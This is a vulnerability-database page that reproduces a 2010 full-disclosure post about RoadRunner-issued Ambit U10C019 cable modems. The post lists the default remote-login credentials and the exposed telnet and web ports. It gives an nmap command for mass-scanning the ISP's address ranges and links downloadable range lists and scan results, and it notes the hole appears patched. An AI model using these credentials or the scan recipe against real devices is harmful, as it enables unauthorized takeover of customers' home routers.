Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RoadRunner Cablemodem Remote Root

🗓️ 12 Aug 2010 00:00:00Reported by Harry StrongburgType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

RoadRunner Cablemodem Remote Root exploit on Ambit U10C019 CableModem. Default login credentials allow remote access on specific ports. Firmware update may have patched the vulnerability

Code
`Hello. This is the introduction to a large-scale RoadRunner Cable-Router exploit on the Ambit U10C019 CableModem.  
  
Basically, the default Cable Router that RoadRunner/TimeWarner gives to its customers by default:  
1) Allows for remote login with user: admin, password: cableroot.  
2) Allows remote access by default. (port 64623 for telnet, port 64680 for webui)  
  
Devices affected:  
Ambit U10C019 CableModem  
Boot code revision : 2.1.6d  
Hardware revision : 4.10  
Software revision : 5.66.1026  
Software build time : Feb 26 2009 12:53:26  
  
  
Example for scanning the RoadRunner IP ranges:  
nmap -PN -T5 --open -p64623 -n -P0 --max-retries 0 --host-timeout 5s -iL rr.lst >> nmap.log; cat nmap.log | grep -B 3 open > open.log  
  
Torrent of files related to this disclosure at https://thepiratebay.org/torrent/5753559/  
Contained in this archive contains:  
rr.lst - list of RoadRunner CIDR blocks.  
open-cleaned.txt - my initial scan of the ranges to see a rough estimate of number of affected devices.  
readme.txt - this file..  
(You can also DDL it at http://harry.lu/files/torrents/rr-ambit-fd.tar.gz; I prfer you use the torrent option to save my bandwidth).  
  
  
This hole appears to have been patched with a firmware update:  
  
$ telnet device.ip 64623  
Trying device.ip...  
Connected to device.ip.  
Escape character is '^]'.  
Connection closed by foreign host.  
  
$ curl -vvv 24.172.42.225:64680  
* About to connect() to device.ip port 64680 (#0)  
* Trying device.ip... connected  
* Connected to device.ip (device.ip) port 64680 (#0)  
> GET / HTTP/1.1  
> User-Agent: curl/7.21.0 (x86_64-unknown-linux-gnu) libcurl/7.21.0 OpenSSL/1.0.0a zlib/1.2.5  
> Host: device.ip:64680  
> Accept: */*  
>   
* Empty reply from server  
* Connection #0 to host device.ip left intact  
curl: (52) Empty reply from server  
* Closing connection #0  
  
  
I use the phrase "appears", as I am unsure. Michael O'Donnel at Road Runner, who is the Chief of Security (if I recall correctly), said he would work   
on it. Later, I did not receive much more contact after the *8 weeks of time* after I contacted them. Recent attempts to contact Michael via leaving   
a voicemail got no reply. (Maybe I shouldn't have been so polite in my disclosure to them, if they don't even bother to contact me when it's fixed?)  
  
  
  
Keep safe.  
--  
Harry Strongburg <harry.fd at harry.lu>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Aug 2010 00:00Current
roadrunnercablemodemremote accessambit u10c019default loginremote loginfirmware update
28